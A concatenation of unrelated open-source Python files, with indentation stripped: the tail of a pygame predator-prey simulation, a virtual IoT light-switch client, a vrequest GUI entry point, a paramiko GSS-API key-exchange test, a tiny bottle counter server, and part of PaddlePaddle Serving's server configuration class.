total_energy=0
if plants[x][y][1] > SPECIE2_MAX_ENERGY_RECOLECTED_PER_CYCLE + int(datafromfile[14]):
total_energy = SPECIE2_MAX_ENERGY_RECOLECTED_PER_CYCLE + int(datafromfile[14])
plants[x][y][1] = plants[x][y][1] - (SPECIE2_MAX_ENERGY_RECOLECTED_PER_CYCLE + int(datafromfile[14]))
else:
total_energy = plants[x][y][1]
plants[x][y][1] = 0
specie2[x][y][1] = specie2[x][y][1] + total_energy
# grow and decrease energy
specie2[x][y][0] += 1
specie2[x][y][1] = specie2[x][y][1] - (SPECIE2_ENERGY_NEEDED_PER_CYCLE + int(datafromfile[13]))
# die if no energy
if specie2[x][y][1] < 0:
specie2[x][y][1] = 0
specie2[x][y][0] = 0
# try to replicate
if specie2[x][y][1] > SPECIE2_ENERGY_TO_REPLICATE and specie2[x][y][2] == 0:
available_spots = [0 for numspots in range(8)]
pos=0
if int(datafromfile[9]) > 0:
if SPECIE2_NEARBORN_CHANCES - int(datafromfile[9]) < 2:
randomborn = 2
else:
randomborn = SPECIE2_NEARBORN_CHANCES - int(datafromfile[9])
random_number = random.randint(1,randomborn)
if specie2[xm][y][0] == 0:
available_spots[pos] = 1
pos += 1
if specie2[xp][y][0] == 0:
available_spots[pos] = 2
pos += 1
if specie2[xm][ym][0] == 0:
available_spots[pos] = 3
pos += 1
if specie2[x][ym][0] == 0:
available_spots[pos] = 4
pos += 1
if specie2[xp][ym][0] == 0:
available_spots[pos] = 5
pos += 1
if specie2[xm][yp][0] == 0:
available_spots[pos] = 6
pos += 1
if specie2[x][yp][0] == 0:
available_spots[pos] = 7
pos += 1
if specie2[xp][yp][0] == 0:
available_spots[pos] = 8
pos += 1
if pos > 0:
rand_pos=random.randint(0,pos-1)
if random_number == 1:
if available_spots[rand_pos] == 1:
specie2[xm][y][0] = 1
specie2[xm][y][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 2:
specie2[xp][y][0] = 1
specie2[xp][y][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 3:
specie2[xm][ym][0] = 1
specie2[xm][ym][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 4:
specie2[x][ym][0] = 1
specie2[x][ym][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 5:
specie2[xp][ym][0] = 1
specie2[xp][ym][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 6:
specie2[xm][yp][0] = 1
specie2[xm][yp][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 7:
specie2[x][yp][0] = 1
specie2[x][yp][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 8:
specie2[xp][yp][0] = 1
specie2[xp][yp][1] = SPECIE2_ENERGY_BASE
# die if too old
if specie2[x][y][0] > SPECIE2_LIFE_EXPECTANCY + int(datafromfile[8]):
specie2[x][y][1] = 0
specie2[x][y][0] = 0
specie2_individuals += 1
specie2_energy += specie2[x][y][1]
# if no individual is alive, random born to avoid extinction
if specie2[x][y][0] == 0 and specie2_neighbours == 0 and specie2[x][y][2] == 0 and ((specie2_last_individuals == 0 and specie2_individuals == 0 and real_mode == 1) or real_mode == 0):
random_number = random.randint(1,SPECIE2_RANDOM_BORN_CHANCES)
if random_number==1:
specie2[x][y][0] = 1
specie2[x][y][1] = SPECIE2_ENERGY_BASE
specie2_individuals +=1
specie2_energy += specie2[x][y][1]
# draw
if gradient_mode == 1:
if plants[x][y][1]>255 * rf:
white = (255,255,255)
else:
white = (int(plants[x][y][1]/rf),int(plants[x][y][1]/rf),int(plants[x][y][1]/rf))
if specie1[x][y][1]>255 * rf:
yellow = (255,255,0)
else:
yellow = (int(specie1[x][y][1]/rf),int(specie1[x][y][1]/rf),0)
if specie2[x][y][1]>255 * rf:
blue = (0,0,255)
else:
blue = (0,0,int(specie2[x][y][1]/rf))
if specie1[x][y][1]+specie2[x][y][1] > 255 * rf:
magenta = (255,0,255)
else:
magenta = (int(specie1[x][y][1]/rf)+int(specie2[x][y][1]/rf),0,int((specie1[x][y][1]+specie2[x][y][1])/rf))
if specie1[x][y][0] > 0 and specie2[x][y][0] > 0:
pygame.draw.circle(screen,magenta,(((x*2*circle_size)+circle_size)+40,((y*2*circle_size)+circle_size)+40),circle_size,0)
if specie1[x][y][0] > 0 and specie2[x][y][0] == 0:
pygame.draw.circle(screen,yellow,(((x*2*circle_size)+circle_size)+40,((y*2*circle_size)+circle_size)+40),circle_size,0)
if specie1[x][y][0] == 0 and specie2[x][y][0] > 0:
pygame.draw.circle(screen,blue,(((x*2*circle_size)+circle_size)+40,((y*2*circle_size)+circle_size)+40),circle_size,0)
if specie1[x][y][0] == 0 and specie2[x][y][0] == 0 and plants[x][y][0] > 0:
pygame.draw.circle(screen,white,(((x*2*circle_size)+circle_size)+40,((y*2*circle_size)+circle_size)+40),circle_size,0)
if specie1[x][y][0] == 0 and specie2[x][y][0] == 0 and plants[x][y][0] == 0:
pygame.draw.circle(screen,black,(((x*2*circle_size)+circle_size)+40,((y*2*circle_size)+circle_size)+40),circle_size,0)
if graph_mode == 1:
# generate graphs
for x in range(1,200):
specie1_Iarray[x-1] = specie1_Iarray[x]
specie2_Iarray[x-1] = specie2_Iarray[x]
plants_Iarray[x-1] = plants_Iarray[x]
specie1_Earray[x-1] = specie1_Earray[x]
specie2_Earray[x-1] = specie2_Earray[x]
plants_Earray[x-1] = plants_Earray[x]
specie1_Iarray[199] = specie1_individuals
specie2_Iarray[199] = specie2_individuals
plants_Iarray[199] = plants_individuals
specie1_Earray[199] = specie1_energy
specie2_Earray[199] = specie2_energy
plants_Earray[199] = plants_energy
# draw graphs
pygame.draw.line(screen,midgrey,(450,350),(650,350))
pygame.draw.line(screen,midgrey,(650,350),(650,20))
pygame.draw.line(screen,midgrey,(700,350),(900,350))
pygame.draw.line(screen,midgrey,(900,350),(900,20))
text_individuals = textfont.render("Individuals",False, midgrey, black)
text_energy = textfont.render("Energy",False, midgrey, black)
screen.blit(text_individuals,(480,400))
screen.blit(text_energy,(740,400))
for x in range(0,200):
pygame.draw.line(screen,yellowgraph,(450+x,350-int(specie1_Iarray[x]/(3*rf))),(450+x,350-int(specie1_Iarray[x]/(3*rf))))
pygame.draw.line(screen,bluegraph,(450+x,350-int(specie2_Iarray[x]/(3*rf))),(450+x,350-int(specie2_Iarray[x]/(3*rf))))
pygame.draw.line(screen,lightgrey,(450+x,350-int(plants_Iarray[x]/(3*rf))),(450+x,350-int(plants_Iarray[x]/(3*rf))))
pygame.draw.line(screen,yellowgraph,(700+x,350-int(specie1_Earray[x]/(500*rf))),(700+x,350-int(specie1_Earray[x]/(500*rf))))
pygame.draw.line(screen,bluegraph,(700+x,350-int(specie2_Earray[x]/(500*rf))),(700+x,350-int(specie2_Earray[x]/(500*rf))))
pygame.draw.line(screen,lightgrey,(700+x,350-int(plants_Earray[x]/(5000*rf))),(700+x,350-int(plants_Earray[x]/(5000*rf))))
# transparent graph for fullscreen mode
if fullscreen_graph == 1 and fullscreen_mode == 1:
# generate fullscreen graphs
for x in range(1,200):
specie1_Iarray[x-1] = specie1_Iarray[x]
specie2_Iarray[x-1] = specie2_Iarray[x]
plants_Iarray[x-1] = plants_Iarray[x]
specie1_Iarray[199] = specie1_individuals
specie2_Iarray[199] = specie2_individuals
plants_Iarray[199] = plants_individuals
for x in range(0,200):
pygame.draw.rect(graphsurface,bluegraph,pygame.Rect(x*10,1080-(int(specie2_Iarray[x]/(3*rf))+int(plants_Iarray[x]/(3*rf))+int(specie1_Iarray[x]/(3*rf))),10,int(specie2_Iarray[x]/(3*rf))))
pygame.draw.rect(graphsurface,yellowgraph,pygame.Rect(x*10,1080-(int(specie1_Iarray[x]/(3*rf))+int(plants_Iarray[x]/(3*rf))),10,int(specie1_Iarray[x]/(3*rf))))
pygame.draw.rect(graphsurface,whitegraph,pygame.Rect(x*10,1080-int(plants_Iarray[x]/(3*rf)),10,int(plants_Iarray[x]/(3*rf))))
screen.blit(graphsurface,(0,0))
if graph_mode == 1:
pygame.draw.rect(screen,black,(40,40,320,320),1)
pygame.display.update()
|
virtual_light_switch.py
|
#!/usr/bin/env python
# encoding: utf-8
'''
Created on June 19, 2016
@author: David Moss
'''
# This module will emulate a light switch device.
import requests
import sys
import json
import threading
import time
import logging
from argparse import ArgumentParser
from argparse import RawDescriptionHelpFormatter
_https_proxy = None
# The input function behaves differently in Python 2.x and 3.x, and there is no raw_input in 3.x.
if hasattr(__builtins__, 'raw_input'):
input=raw_input
def main(argv=None):
if argv is None:
argv = sys.argv
else:
sys.argv.extend(argv)
parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter)
parser.add_argument("-d", "--deviceId", dest="deviceId", help="Globally unique device ID")
parser.add_argument("-u", "--username", dest="username", help="Username")
parser.add_argument("-p", "--password", dest="password", help="Password")
parser.add_argument("-s", "--server", dest="server", help="Base server URL (app.presencepro.com)")
parser.add_argument("-b", "--brand", dest="brand", help="Brand name partner to interact with the correct servers: 'myplace', 'origin', 'presence', etc.")
parser.add_argument("--httpdebug", dest="httpdebug", action="store_true", help="HTTP debug logger output")
parser.add_argument("--https_proxy", dest="https_proxy", help="If your corporate network requires a proxy, type in the full HTTPS proxy address here (i.e. http://10.10.1.10:1080)")
# Process arguments
args = parser.parse_args()
# Extract the arguments
deviceId = args.deviceId
username = args.username
password = args.password
server = args.server
httpdebug = args.httpdebug
brand = args.brand
if brand is not None:
brand = brand.lower()
if brand == 'presence':
print(Color.BOLD + "\nPresence by People Power" + Color.END)
server = "app.presencepro.com"
elif brand == 'myplace':
print(Color.BOLD + "\nMyPlace - Smart. Simple. Secure." + Color.END)
server = "iot.peoplepowerco.com"
elif brand == 'origin':
print(Color.BOLD + "\nOrigin Home HQ" + Color.END)
server = "app.originhomehq.com.au"
elif brand == 'innogy':
print(Color.BOLD + "\ninnogy SmartHome" + Color.END)
server = "innogy.presencepro.com"
else:
sys.stderr.write("This brand does not exist: " + str(brand) + "\n\n")
return 1
if not deviceId:
deviceId = input('Specify a globally unique device ID for this virtual device: ')
global _https_proxy
_https_proxy = None
if args.https_proxy is not None:
_https_proxy = {
'https': args.https_proxy
}
# Define the bot server
if not server:
server = "https://app.presencepro.com"
if "http" not in server:
server = "https://" + server
# HTTP Debugging
if httpdebug:
try:
import http.client as http_client
except ImportError:
# Python 2
import httplib as http_client
http_client.HTTPConnection.debuglevel = 1
# You must initialize logging, otherwise you'll not see debug output.
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
# Grab the device server
device_server = _get_ensemble_server_url(server, deviceId)
# Login to your user account
app_key, user_info = _login(server, username, password)
# This is the device type of this virtual device
deviceType = 10072
# Grab the user's primary location ID
locationId = user_info['locations'][0]['id']
# Register the virtual device to your user's account
_register_device(server, app_key, locationId, deviceId, deviceType, "Virtual Light Switch")
# Persistent connection to listen for commands
# This light switch device does not receive commands; the code is kept here for templating purposes.
#t = threading.Thread(target=_listen, args=(device_server, deviceId))
#t.start()
# Menu to send data
t = threading.Thread(target=_menu, args=(device_server, deviceId))
t.start()
def _menu(device_server, device_id):
"""Print the menu of commands and let the user select a command"""
while True:
print("\n\n")
print("[" + device_id + "]: Virtual Light Switch")
print("0 - Switch off")
print("1 - Switch on")
print("2 - Fast toggle: Off / On / Off")
print("3 - Fast toggle: Off / On / Off / On / Off")
try:
value = int(input('> '))
if value == 0 or value == 1:
_do_command(device_server, device_id, value)
elif value == 2:
_do_command(device_server, device_id, 0)
_do_command(device_server, device_id, 1)
_do_command(device_server, device_id, 0)
elif value == 3:
_do_command(device_server, device_id, 0)
_do_command(device_server, device_id, 1)
_do_command(device_server, device_id, 0)
_do_command(device_server, device_id, 1)
_do_command(device_server, device_id, 0)
except ValueError:
print("???")
def _do_command(device_server, device_id, value):
'''Send a command to the server
:params device_server: Server to use
:params device_id: Device ID to command
:params value: Value to send
'''
global _https_proxy
measurementPayload = {
"version": 2,
"sequenceNumber": 1,
"proxyId": device_id,
"measures":[
{
"deviceId": device_id,
"params": [
{
"name":"ppc.switchStatus",
"value":value
}
]
}
]
}
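# ppc.switchStatus is the parameter this virtual switch reports: 0 = off, 1 = on,
# matching the menu options above.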
http_headers = {"Content-Type": "application/json"}
print("Sending measurement: " + str(measurementPayload))
r = requests.post(device_server + "/deviceio/mljson", headers=http_headers, data=json.dumps(measurementPayload), proxies=_https_proxy)
print("Sent: " + str(r.text))
def _listen(device_server, deviceId):
"""Listen for commands"""
global _https_proxy
while True:
try:
print("\n[" + deviceId + "]: Listening for commands")
http_headers = {"Content-Type": "application/json"}
r = requests.get(device_server + "/deviceio/mljson", params={"id":deviceId, "timeout":60}, headers=http_headers, timeout=60, proxies=_https_proxy)
command = json.loads(r.text)
print("[" + deviceId + "]: Command received: " + str(command))
# Ack the command
commandId = command['commands'][0]['commandId']
ackPayload = {"version":2, "proxyId": deviceId, "sequenceNumber": 1, "responses": [{"commandId":commandId, "result":1}]}
result = requests.post(device_server + "/deviceio/mljson", headers=http_headers, data=json.dumps(ackPayload), proxies=_https_proxy)
except Exception as e:
print("Exception: " + str(e))
time.sleep(1)
def _login(server, username, password):
"""Get an Bot API key and User Info by login with a username and password"""
global _https_proxy
if not username:
username = input('Email address: ')
if not password:
import getpass
password = getpass.getpass('Password: ')
try:
import requests
# login by username and password
http_headers = {"PASSWORD": password, "Content-Type": "application/json"}
r = requests.get(server + "/cloud/json/login", params={"username":username}, headers=http_headers, proxies=_https_proxy)
j = json.loads(r.text)
_check_for_errors(j)
app_key = j['key']
# get user info
http_headers = {"PRESENCE_API_KEY": app_key, "Content-Type": "application/json"}
r = requests.get(server + "/cloud/json/user", headers=http_headers, proxies=_https_proxy)
j = json.loads(r.text)
_check_for_errors(j)
return app_key, j
except BotError as e:
sys.stderr.write("Error: " + e.msg)
sys.stderr.write("\nCreate an account on " + server + " and use it to sign in")
sys.stderr.write("\n\n")
raise e
def _register_device(server, appKey, locationId, deviceId, deviceType, description):
"""
Register a device to the user's account
"""
global _https_proxy
http_headers = {"API_KEY": appKey, "Content-Type": "application/json"}
r = requests.post(server + "/cloud/json/devices", params={"locationId":locationId, "deviceId":deviceId, "deviceType":deviceType, "desc":description}, headers=http_headers, proxies=_https_proxy)
j = json.loads(r.text)
_check_for_errors(j)
return j
def _get_ensemble_server_url(server, device_id=None):
"""
Get server URL
"""
global _https_proxy
import requests
http_headers = {"Content-Type": "application/json"}
params = {"type": "deviceio", "ssl": True}
if not device_id:
# to be removed
params['deviceId'] = "nodeviceid"
else:
params['deviceId'] = device_id
r = requests.get(server + "/cloud/json/settingsServer", params=params, headers=http_headers, proxies=_https_proxy)
return r.text
def _check_for_errors(json_response):
"""Check some JSON response for BotEngine errors"""
if not json_response:
raise BotError("No response from the server!", -1)
if json_response['resultCode'] > 0:
msg = "Unknown error!"
if 'resultCodeMessage' in json_response.keys():
msg = json_response['resultCodeMessage']
elif 'resultCodeDesc' in json_response.keys():
msg = json_response['resultCodeDesc']
raise BotError(msg, json_response['resultCode'])
del(json_response['resultCode'])
class BotError(Exception):
"""BotEngine exception to raise and log errors."""
def __init__(self, msg, code):
super(BotError).__init__(type(self))
self.msg = msg
self.code = code
def __str__(self):
return self.msg
def __unicode__(self):
return self.msg
#===============================================================================
# Color Class for CLI
#===============================================================================
class Color:
"""Color your command line output text with Color.WHATEVER and Color.END"""
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
if __name__ == "__main__":
sys.exit(main())
|
main.py
|
import os
import sys
from . import __version__
from .root import (
root,
config,
change_siz,
)
from .menu import bind_menu
from .tab import (
nb,
bind_frame,
delete_curr_tab,
cancel_delete,
create_new_reqtab,
create_new_rsptab,
create_helper,
change_tab_name,
send_request,
save_config,
switch_response_log,
create_test_code,
create_scrapy_code,
get_html_pure_text,
get_xpath_elements,
get_auto_xpath,
get_auto_json,
choice_auto_json,
execute_code,
execute_scrapy_code,
create_js_parse,
create_temp_idle,
create_cmd_idle,
create_encoder,
create_test_code_urllib,
)
from .combinekey import (
bind_ctl_key,
bind_alt_key,
)
# These frames are the GUI views that currently need to be designed and handled
from .frame import (
helper_window,
request_window,
)
# === Initialization ===
settings = config['set']
if not settings:
create_helper()
else:
for key,setting in settings.items():
if setting.get('type') == 'request':
tab_id = bind_frame(request_window(setting),key)
if key == config['focus']:
nb.select(tab_id) # keep focus on the tab that was active at the last successful run
# === Create / Delete / Help ===
# Bind the right-click menu
bind_menu(create_new_reqtab,'创建请求标签 [Ctrl+q]')
bind_menu(delete_curr_tab, '删除当前标签 [Ctrl+w]')
bind_menu(change_tab_name, '改当前标签名 [Ctrl+e]')
bind_menu(save_config, '保存配置快照 [Ctrl+s]')
bind_menu(create_js_parse, '创建 js解析页 [Ctrl+j]')
bind_menu(create_helper, '帮助文档标签 [Ctrl+h]')
bind_menu(create_encoder, '创建便捷加密编码窗口')
# Bind Ctrl + key combinations
bind_ctl_key(create_new_reqtab, 'q')
bind_ctl_key(delete_curr_tab, 'w')
# Undo with ctrl + shift + w (only works for saved configs, and the undo queue is cleared when the program exits)
bind_ctl_key(cancel_delete, 'w',shift=True)
bind_ctl_key(change_tab_name, 'e')
bind_ctl_key(save_config, 's')
bind_ctl_key(send_request, 'r')
bind_ctl_key(create_helper, 'h')
bind_ctl_key(create_js_parse, 'j')
bind_ctl_key(create_cmd_idle, '`')
# Bind response events
bind_alt_key(create_new_rsptab, 'r')
bind_alt_key(create_test_code, 'c') # generate code
bind_alt_key(get_html_pure_text, 'd') # get text
bind_alt_key(get_xpath_elements, 'x') # get xpath
bind_alt_key(get_auto_xpath, 'f') # auto-parse xpath
bind_alt_key(get_auto_json, 'z') # analyze json lists
bind_alt_key(choice_auto_json, 'q') # select json list
bind_alt_key(execute_code, 'v') # execute code
bind_alt_key(create_scrapy_code, 's') # generate scrapy code
bind_alt_key(execute_scrapy_code, 'w') # execute scrapy code in the auto-generated environment
bind_alt_key(create_temp_idle, '`') # use a temporary IDLE editor
bind_alt_key(create_test_code_urllib, 'u') # generate urllib (py3) request code
def algo():
from .frame import encode_window
fr = encode_window()
ico = os.path.join(os.path.split(__file__)[0],'ico.ico')
fr.iconbitmap(ico)
fr.title('命令行输入 ee 则可快速打开便捷加密窗口(为防冲突,输入vv e也可以打开), 组合快捷键 Alt+` 快速打开IDLE')
fr.bind('<Escape>',lambda *a:fr.master.quit())
fr.bind('<Alt-`>',lambda *a:create_temp_idle())
fr.protocol("WM_DELETE_WINDOW",lambda *a:fr.master.quit())
fr.master.withdraw()
fr.mainloop()
def execute():
argv = sys.argv
if 'e' in argv:
algo()
return
def preimport():
import time
time.sleep(.5) # packages that take a while to import are preloaded in a separate thread to keep the tool responsive
try: import js2py
except: pass
try: import execjs
except: pass
import threading
threading.Thread(target=preimport).start()
root.title('vrequest [{}]'.format(__version__))
ico = os.path.join(os.path.split(__file__)[0],'ico.ico')
root.iconbitmap(ico)
root.geometry(config.get('siz') or '600x725+100+100')
root.bind('<Configure>',lambda e:change_siz())
root.bind('<Escape>',lambda e:switch_response_log())
root.mainloop()
if __name__ == '__main__':
execute()
|
test_kex_gss.py
|
# Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
# Copyright (C) 2013-2014 science + computing ag
# Author: Sebastian Deiss <sebastian.deiss@t-online.de>
#
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
Unit Tests for the GSS-API / SSPI SSHv2 Diffie-Hellman Key Exchange and user
authentication
"""
import socket
import threading
import unittest
import paramiko
class NullServer (paramiko.ServerInterface):
def get_allowed_auths(self, username):
return 'gssapi-keyex'
def check_auth_gssapi_keyex(self, username,
gss_authenticated=paramiko.AUTH_FAILED,
cc_file=None):
if gss_authenticated == paramiko.AUTH_SUCCESSFUL:
return paramiko.AUTH_SUCCESSFUL
return paramiko.AUTH_FAILED
def enable_auth_gssapi(self):
UseGSSAPI = True
return UseGSSAPI
def check_channel_request(self, kind, chanid):
return paramiko.OPEN_SUCCEEDED
def check_channel_exec_request(self, channel, command):
if command != 'yes':
return False
return True
class GSSKexTest(unittest.TestCase):
@staticmethod
def init(username, hostname):
global krb5_principal, targ_name
krb5_principal = username
targ_name = hostname
def setUp(self):
self.username = krb5_principal
self.hostname = socket.getfqdn(targ_name)
self.sockl = socket.socket()
self.sockl.bind((targ_name, 0))
self.sockl.listen(1)
self.addr, self.port = self.sockl.getsockname()
self.event = threading.Event()
thread = threading.Thread(target=self._run)
thread.start()
def tearDown(self):
for attr in "tc ts socks sockl".split():
if hasattr(self, attr):
getattr(self, attr).close()
def _run(self):
self.socks, addr = self.sockl.accept()
self.ts = paramiko.Transport(self.socks, gss_kex=True)
host_key = paramiko.RSAKey.from_private_key_file('tests/test_rsa.key')
self.ts.add_server_key(host_key)
self.ts.set_gss_host(targ_name)
try:
self.ts.load_server_moduli()
except:
print ('(Failed to load moduli -- gex will be unsupported.)')
server = NullServer()
self.ts.start_server(self.event, server)
def test_1_gsskex_and_auth(self):
"""
Verify that Paramiko can handle SSHv2 GSS-API / SSPI authenticated
Diffie-Hellman Key Exchange and user authentication with the GSS-API
context created during key exchange.
"""
host_key = paramiko.RSAKey.from_private_key_file('tests/test_rsa.key')
public_host_key = paramiko.RSAKey(data=host_key.asbytes())
self.tc = paramiko.SSHClient()
self.tc.get_host_keys().add('[%s]:%d' % (self.hostname, self.port),
'ssh-rsa', public_host_key)
self.tc.connect(self.hostname, self.port, username=self.username,
gss_auth=True, gss_kex=True)
self.event.wait(1.0)
self.assert_(self.event.is_set())
self.assert_(self.ts.is_active())
self.assertEquals(self.username, self.ts.get_username())
self.assertEquals(True, self.ts.is_authenticated())
stdin, stdout, stderr = self.tc.exec_command('yes')
schan = self.ts.accept(1.0)
schan.send('Hello there.\n')
schan.send_stderr('This is on stderr.\n')
schan.close()
self.assertEquals('Hello there.\n', stdout.readline())
self.assertEquals('', stdout.readline())
self.assertEquals('This is on stderr.\n', stderr.readline())
self.assertEquals('', stderr.readline())
stdin.close()
stdout.close()
stderr.close()
|
counter.py
|
from bottle import post, run, request
import threading
import time
count = 0
@post('/')
def index():
global count
count += int(request.body.read())
return b''
def show():
prev = 0
while True:
start = time.time()
time.sleep(1)
now = time.time()
dur = now - start
print(int((count - prev) / dur), 'ops')
start = now
prev = count
threading.Thread(target=show).start()
run(host='localhost', port=7000, quiet=True)
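# Example client (assumed usage): POST a plain integer body to bump the counter,
# e.g. `curl -X POST --data 5 http://localhost:7000/`.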
|
server.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import tarfile
import socket
import paddle_serving_server as paddle_serving_server
from paddle_serving_server.rpc_service import MultiLangServerServiceServicer
from .proto import server_configure_pb2 as server_sdk
from .proto import general_model_config_pb2 as m_config
from .proto import multi_lang_general_model_service_pb2_grpc
import google.protobuf.text_format
import time
from .version import version_tag, version_suffix, device_type
from contextlib import closing
import argparse
import sys
if sys.platform.startswith('win') is False:
import fcntl
import shutil
import platform
import numpy as np
import grpc
import sys
import collections
from multiprocessing import Pool, Process
from concurrent import futures
class Server(object):
def __init__(self):
"""
self.model_toolkit_conf:'list'=[] # The quantity of self.model_toolkit_conf is equal to the InferOp quantity/Engine--OP
self.model_conf:'collections.OrderedDict()' # Save the serving_server_conf.prototxt content (feed and fetch information) this is a map for multi-model in a workflow
self.workflow_fn:'str'="workflow.prototxt" # Only one for one Service/Workflow
self.resource_fn:'str'="resource.prototxt" # Only one for one Service,model_toolkit_fn and general_model_config_fn is recorded in this file
self.infer_service_fn:'str'="infer_service.prototxt" # Only one for one Service,Service--Workflow
self.model_toolkit_fn:'list'=[] # ["general_infer_0/model_toolkit.prototxt"]The quantity is equal to the InferOp quantity,Engine--OP
self.general_model_config_fn:'list'=[] # ["general_infer_0/general_model.prototxt"]The quantity is equal to the InferOp quantity,Feed and Fetch --OP
self.subdirectory:'list'=[] # The quantity is equal to the InferOp quantity, and name = node.name = engine.name
self.model_config_paths:'collections.OrderedDict()' # Save the serving_server_conf.prototxt path (feed and fetch information) this is a map for multi-model in a workflow
"""
self.server_handle_ = None
self.infer_service_conf = None
self.model_toolkit_conf = []
self.resource_conf = None
self.memory_optimization = False
self.ir_optimization = False
self.model_conf = collections.OrderedDict()
self.workflow_fn = "workflow.prototxt"
self.resource_fn = "resource.prototxt"
self.infer_service_fn = "infer_service.prototxt"
self.model_toolkit_fn = []
self.general_model_config_fn = []
self.subdirectory = []
self.cube_config_fn = "cube.conf"
self.workdir = ""
self.max_concurrency = 0
self.num_threads = 2
self.port = 8080
self.precision = "fp32"
self.use_calib = False
self.reload_interval_s = 10
self.max_body_size = 64 * 1024 * 1024
self.module_path = os.path.dirname(paddle_serving_server.__file__)
self.cur_path = os.getcwd()
self.use_local_bin = False
self.mkl_flag = False
self.device = "cpu"
self.gpuid = 0
self.use_trt = False
self.use_lite = False
self.use_xpu = False
self.model_config_paths = collections.OrderedDict()
self.product_name = None
self.container_id = None
def get_fetch_list(self, infer_node_idx=-1):
fetch_names = [
var.alias_name
for var in list(self.model_conf.values())[infer_node_idx].fetch_var
]
return fetch_names
def set_max_concurrency(self, concurrency):
self.max_concurrency = concurrency
def set_num_threads(self, threads):
self.num_threads = threads
def set_max_body_size(self, body_size):
if body_size >= self.max_body_size:
self.max_body_size = body_size
else:
print(
"max_body_size is less than default value, will use default value in service."
)
def use_encryption_model(self, flag=False):
self.encryption_model = flag
def set_port(self, port):
self.port = port
def set_precision(self, precision="fp32"):
self.precision = precision
def set_use_calib(self, use_calib=False):
self.use_calib = use_calib
def set_reload_interval(self, interval):
self.reload_interval_s = interval
def set_op_sequence(self, op_seq):
self.workflow_conf = op_seq
def set_op_graph(self, op_graph):
self.workflow_conf = op_graph
def set_memory_optimize(self, flag=False):
self.memory_optimization = flag
def set_ir_optimize(self, flag=False):
self.ir_optimization = flag
def set_product_name(self, product_name=None):
if product_name == None:
raise ValueError("product_name can't be None.")
self.product_name = product_name
def set_container_id(self, container_id):
if container_id == None:
raise ValueError("container_id can't be None.")
self.container_id = container_id
def check_local_bin(self):
if "SERVING_BIN" in os.environ:
self.use_local_bin = True
self.bin_path = os.environ["SERVING_BIN"]
def check_cuda(self):
if os.system("ls /dev/ | grep nvidia > /dev/null") == 0:
pass
else:
raise SystemExit(
"GPU not found, please check your environment or use cpu version by \"pip install paddle_serving_server\""
)
def set_device(self, device="cpu"):
self.device = device
def set_gpuid(self, gpuid=0):
self.gpuid = gpuid
def set_trt(self):
self.use_trt = True
def set_lite(self):
self.use_lite = True
def set_xpu(self):
self.use_xpu = True
def _prepare_engine(self, model_config_paths, device, use_encryption_model):
if self.model_toolkit_conf == None:
self.model_toolkit_conf = []
for engine_name, model_config_path in model_config_paths.items():
engine = server_sdk.EngineDesc()
engine.name = engine_name
# engine.reloadable_meta = model_config_path + "/fluid_time_file"
engine.reloadable_meta = model_config_path + "/fluid_time_file"
os.system("touch {}".format(engine.reloadable_meta))
engine.reloadable_type = "timestamp_ne"
engine.runtime_thread_num = 0
engine.batch_infer_size = 0
engine.enable_batch_align = 0
engine.model_dir = model_config_path
engine.enable_memory_optimization = self.memory_optimization
engine.enable_ir_optimization = self.ir_optimization
engine.use_trt = self.use_trt
engine.use_lite = self.use_lite
engine.use_xpu = self.use_xpu
engine.use_gpu = False
if self.device == "gpu":
engine.use_gpu = True
if os.path.exists('{}/__params__'.format(model_config_path)):
engine.combined_model = True
else:
engine.combined_model = False
if use_encryption_model:
engine.encrypted_model = True
engine.type = "PADDLE_INFER"
self.model_toolkit_conf.append(server_sdk.ModelToolkitConf())
self.model_toolkit_conf[-1].engines.extend([engine])
def _prepare_infer_service(self, port):
if self.infer_service_conf == None:
self.infer_service_conf = server_sdk.InferServiceConf()
self.infer_service_conf.port = port
infer_service = server_sdk.InferService()
infer_service.name = "GeneralModelService"
infer_service.workflows.extend(["workflow1"])
self.infer_service_conf.services.extend([infer_service])
def _prepare_resource(self, workdir, cube_conf):
self.workdir = workdir
if self.resource_conf == None:
self.resource_conf = server_sdk.ResourceConf()
for idx, op_general_model_config_fn in enumerate(
self.general_model_config_fn):
with open("{}/{}".format(workdir, op_general_model_config_fn),
"w") as fout:
fout.write(str(list(self.model_conf.values())[idx]))
for workflow in self.workflow_conf.workflows:
for node in workflow.nodes:
if "dist_kv" in node.name:
self.resource_conf.cube_config_path = workdir
self.resource_conf.cube_config_file = self.cube_config_fn
if cube_conf == None:
raise ValueError(
"Please set the path of cube.conf while use dist_kv op."
)
shutil.copy(cube_conf, workdir)
if "quant" in node.name:
self.resource_conf.cube_quant_bits = 8
